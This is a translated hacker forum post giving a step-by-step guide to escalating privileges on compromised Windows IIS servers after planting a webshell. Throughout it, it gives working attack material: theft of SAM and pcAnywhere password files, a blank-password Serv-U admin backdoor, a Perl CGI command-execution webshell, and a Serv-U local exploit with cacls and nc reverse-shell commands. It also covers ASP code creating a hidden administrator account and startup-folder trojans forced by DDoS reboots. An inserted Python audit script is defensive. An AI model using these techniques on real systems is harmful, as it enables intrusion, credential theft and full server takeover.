When you get a webshell, the next step is to escalate privileges.
My personal summary is as follows:
1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere: see whether the webshell can jump into this directory. If it can, download the .CIF file directly, recover the pcAnywhere password from it, and log on.
2. C:\winnt\system32\config: take the SAM from here and crack the users' passwords.
The tools for cracking SAM passwords are LC (L0phtCrack) and SAMInside. Note that the live SAM is locked by the running system; the backup copy under C:\winnt\repair is often readable instead.
3. C:\Documents and Settings\All Users\Start Menu\Programs: we can get a lot of useful information here.
There are many shortcuts. We usually pick Serv-U, open the shortcut's properties to learn the install path, and then check whether the webshell can jump there.
Once inside, if you have permission to modify ServUDaemon.ini, add a user with a blank password:
[USER=wekwen|1]
Password=
HomeDir=C:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=F:\|RWAMELCDP
SKEYValues=
Maintenance=System makes this user a Serv-U system administrator with full rights on every listed drive. Log in over FTP and use quote site exec xxx to run commands and escalate.
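As an added example (not code from the original post), here is a small Python audit that reads a ServUDaemon.ini and flags exactly the account shape described in step 3: blank password, Maintenance=System, and drive-root Access entries with full rights. It assumes the Serv-U 3.x to 5.x ini layout shown above ([USER=name|1] sections with Password=, Maintenance= and Access1..N=path|rights keys); the sample ini inside it is constructed, and the clean 'backup' account is there only to show a non-finding.

```python
"""Audit a Serv-U ServUDaemon.ini for backdoor-style accounts.

Added example, not code from the original post. Assumes the Serv-U 3.x-5.x
ini layout: one [USER=name|1] section per account with Password=,
Maintenance= and Access1..N=path|rights keys. SAMPLE_INI below is
constructed for the demo; the 'backup' account is a clean control case.
"""
import configparser
import sys

# Constructed sample, not taken from any real host.
SAMPLE_INI = r"""
[GLOBAL]
Version=5.2.0.1

[USER=backup|1]
Password=ab1f2e3d4c5b6a79880716253443526170
HomeDir=D:\ftp\backup
Access1=D:\ftp\backup|RL

[USER=wekwen|1]
Password=
HomeDir=C:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=D:\|RWAMELCDP
Access3=F:\|RWAMELCDP
SKEYValues=
"""

# The rights string Serv-U writes when an account gets every file and
# directory right it offers under a path.
FULL_RIGHTS = "RWAMELCDP"


def parse_serv_u_ini(text):
    """Return {username: {key: value}} for every [USER=...|n] section."""
    # strict=False tolerates duplicate keys/sections, which real files
    # (and the post above, with three Access1 lines) sometimes contain.
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.optionxform = str            # keep key case as written in the file
    cp.read_string(text)
    users = {}
    for section in cp.sections():
        if not section.upper().startswith("USER="):
            continue
        # "[USER=wekwen|1]": the part after '|' is the domain id, not the name
        name = section.split("=", 1)[1].split("|", 1)[0]
        users[name] = dict(cp[section])
    return users


def drive_root(path):
    """True for a bare drive root such as C:\\ or C: (with or without slash)."""
    p = path.strip().rstrip("\\/")
    return len(p) == 2 and p[1] == ":" and p[0].isalpha()


def audit_users(users):
    """Return {username: [issue, ...]} for accounts matching the backdoor shape."""
    findings = {}
    for name, opts in users.items():
        issues = []
        if opts.get("Password", "") == "":
            issues.append("blank password")
        if opts.get("Maintenance", "None").lower() == "system":
            issues.append("Maintenance=System (server admin; SITE EXEC runs programs)")
        for key, value in opts.items():
            if not key.lower().startswith("access"):
                continue
            path, _, rights = value.partition("|")
            if drive_root(path):
                full = set(FULL_RIGHTS) <= set(rights.upper())
                issues.append(f"{key}: drive root {path} with "
                              f"{'full' if full else rights} rights")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # ServUDaemon.ini is ANSI text; latin-1 decodes any byte without error.
        with open(sys.argv[1], encoding="latin-1") as fh:
            ini_text = fh.read()
    else:
        ini_text = SAMPLE_INI
    for user, issues in audit_users(parse_serv_u_ini(ini_text)).items():
        print(f"[!] {user}")
        for issue in issues:
            print(f"    - {issue}")
```

Run it with no arguments to see the constructed sample flagged, or pass the path of a real ServUDaemon.ini. The check deliberately keys on the combination rather than on any single username, since the name in the post is arbitrary.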
4. C:\winnt\system32\inetsrv\data is a directory that Everyone has full control over by default. All we need to do is upload the privilege escalation tool there and execute it.
5. Check whether you can jump to the following directories:
C:\PHP, use phpspy.
C:\Perl. It is not always this directory (you can also download the shortcut and read its properties). Write the following cmd.pl:
#!/usr/bin/perl
# Minimal CGI command runner: everything after '?' in the URL is executed.
binmode(STDOUT);
syswrite(STDOUT, "Content-Type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;        # decode URL-encoded spaces
s/%2f/\//ig;       # decode URL-encoded slashes
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";   # show errors in the page too
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
Save it as a .cgi file and run it.
If that does not work, try the .pl extension: rename the .cgi file to .pl and request http://anyhost/cmd.pl?dir
If "Access Denied" comes back, the script did execute (the denial came from the command, not from the web server), so command execution works. Now upload su.exe (the Serv-U privilege escalation tool) to the Perl bin directory and request:
http://anyhost/cmd.pl?c:\perl\bin\su.exe
It returns:
Serv-U > 3.x Local Exploit by Xiaolu
Usage: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
We are still running as IUSR (the anonymous web account), so submit:
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe C: /e /t /g everyone:F"
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe D: /e /t /g everyone:F"
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe E: /e /t /g everyone:F"
http://anyhost/cmd.pl?c:\perl\bin\su.exe "cacls.exe F: /e /t /g everyone:F"
If the following output is returned, the operation succeeded:
Serv-U > 3.x Local Exploit by Xiaolu
< 220 Serv-U FTP Server v5.2 for WinSock ready...
> USER LocalAdministrator
< 331 User name okay, need password.
******************************************************
> PASS #l@$ak#.lk;0@P
< 230 User logged in, proceed.
******************************************************
> SITE MAINTENANCE
******************************************************
[+] Creating new domain...
< 200-DomainID=2
< 220 Domain settings saved
******************************************************
[+] Domain XL:2 created
[+] Creating evil user
< 200-User=XL
< 200 User settings saved
******************************************************
[+] Now exploiting...
> USER XL
< 331 User name okay, need password.
******************************************************
> PASS 111111
< 230 User logged in, proceed.
******************************************************
[+] Now executing: cacls.exe C: /e /t /g everyone:F
< 220 Domain deleted
This gives Everyone full control of every partition.
Now add our web account to the Administrators group:
http://anyhost/cmd.pl?c:\perl\bin\su.exe "net localgroup administrators iusr_anyhost /add"
(IUSR_<hostname> is the anonymous web account; replace anyhost with the real host name.)
6. You can also escalate with adsutil.vbs. Run:
cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps
This lists the privileged DLLs, the ISAPI extensions that run in-process inside inetinfo.exe (as LocalSystem): idq.dll, httpext.dll, httpodbc.dll, ssinc.dll, msw3prt.dll.
Then add asp.dll to that privileged set.
asp.dll lives at c:\winnt\system32\inetsrv\asp.dll (the location may differ between hosts).
Since set replaces the whole list, repeat the existing entries and append asp.dll:
cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\winnt\system32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "C:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "C:\winnt\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
Use cscript adsutil.vbs get /w3svc/InProcessIsapiApps to check that it was added.
7. You can also try the following code to escalate; the effect does not seem obvious.
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next
Session.Timeout = 50
Server.ScriptTimeout = 3000
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/administrators,group")
' the trailing $ hides the account from "net user" listings
Set od = ob.Create("user", "wekwen$")
od.SetPassword "wekwen"   ' <----- password
od.SetInfo
Set of = GetObject(oz & "/wekwen$,user")
oe.Add of.ADsPath         ' put the new account into Administrators
Response.Write "wekwen$ super account created successfully!"
%>
Use this code to check whether the escalation succeeded:
<%@ codepage=936 %>
<%
Response.Expires = 0
On Error Resume Next   ' list the accounts in the Administrators group
Set tn = Server.CreateObject("WScript.Network")
Set objGroup = GetObject("WinNT://" & tn.ComputerName & "/administrators,group")
For Each admin In objGroup.Members
    Response.Write admin.Name & "<br>"
Next
If Err Then
    Response.Write "No: WScript.Network"
End If
%>
8. C:\Program Files\Java Web Start: if it exists, try a JSP webshell. I have never seen a JSP webshell run with low privileges.
9. Finally, if the host configuration is loose, try dropping a .bat or .vbs trojan into C:\Documents and Settings\All Users\Start Menu\Programs\Startup,
then wait for the host to reboot (or force a reboot with DDoS) to escalate.